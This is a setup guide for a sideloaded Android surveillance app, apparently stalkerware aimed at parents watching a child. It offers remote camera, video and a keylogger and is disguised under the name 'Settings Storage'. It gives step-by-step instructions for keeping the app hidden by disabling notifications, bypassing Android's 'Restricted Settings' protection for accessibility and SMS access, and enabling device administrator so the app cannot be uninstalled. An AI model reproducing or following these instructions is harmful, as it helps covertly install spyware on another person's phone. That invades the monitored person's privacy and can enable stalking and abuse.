Crucial Permissions (CRITICAL)

The app will ask for permissions as part of the setup. It is mandatory to configure these properly, otherwise the app will stop working in the background.

1. Draw over other apps (Display over other apps)

Required: You must Turn this ON. Without this, the remote Camera and Video features will not run at all.

2. Accessibility Settings

Required: This is highly essential. If not enabled, the background Camera, Video, Keylogger, and other core features can randomly stop working.

⚠️ Android 13/14/15/16 Note: If you see a "Restricted Setting" grey popup:
Go to phone Settings > Apps > Click on the Application > Click the 3 dots (⋮) top-right > Allow restricted settings > Enter phone lock. Then go back and enable Accessibility.

3. Auto-Start (Background Start)

Required: You must allow Auto-Start. If you don't turn this on, the application will completely stop working in the background when the child closes it.

4. Battery Optimization

Required: Set the Battery Saver or Optimization setting strictly to Unrestricted / No Restrictions so the phone's system doesn't kill the app automatically.

5. Disable Notifications

Required: To ensure the app remains completely hidden, go to phone settings, open the app info, and Turn OFF all notifications.

6. Device Administrator (Optional)

If the app does not hide completely on your child's phone and you feel that the child might uninstall the application, you should activate Device Administrator during setup. This prevents the child from easily uninstalling the app.

⚠️ Fix "Restricted Setting" on Android 13/14/15/16

On Android 13 and above, Google has added a security feature called "Restricted Settings". When you try to enable SMS Permission, Accessibility Service, or Notification Listener for apps installed via APK (sideloaded), the phone shows a grey popup saying "For your security, this setting is currently unavailable".

🔒 This affects these critical permissions:

📱 SMS Permission ♿ Accessibility Service 🔔 Notification Listener

What does the "Restricted Setting" popup look like?

For your security, this setting is currently unavailable.

👆 If you see this popup, follow the steps below to fix it.

✅ How to Fix (Step-by-Step)

⚙️
Open Phone Settings

2
📦
Go to Apps
Find and tap "Apps" or "App Management".
3
🔍
Find the App
Scroll down and tap on "Settings Storage" (the installed app).
4
Tap 3 Dots Menu
In the top-right corner, tap the three dots (⋮) menu icon.
5
🔓
Allow Restricted Settings
Tap "Allow restricted settings" from the menu.
6
🔑
Enter Phone Lock
Enter your PIN / Pattern / Password to confirm.

📋 The 3-dot menu will look like this:

← App info
🔓 Allow restricted settings
Uninstall updates
Open by default

✅ After completing the above steps:

  • Go back and try enabling Accessibility Service → It will now work!
  • Go back and try enabling Notification Listener → It will now work!
  • The SMS Permission popup will now allow you to press "Allow".

💡 Tip: You only need to do this ONCE. After allowing restricted settings, all three permissions will work normally.
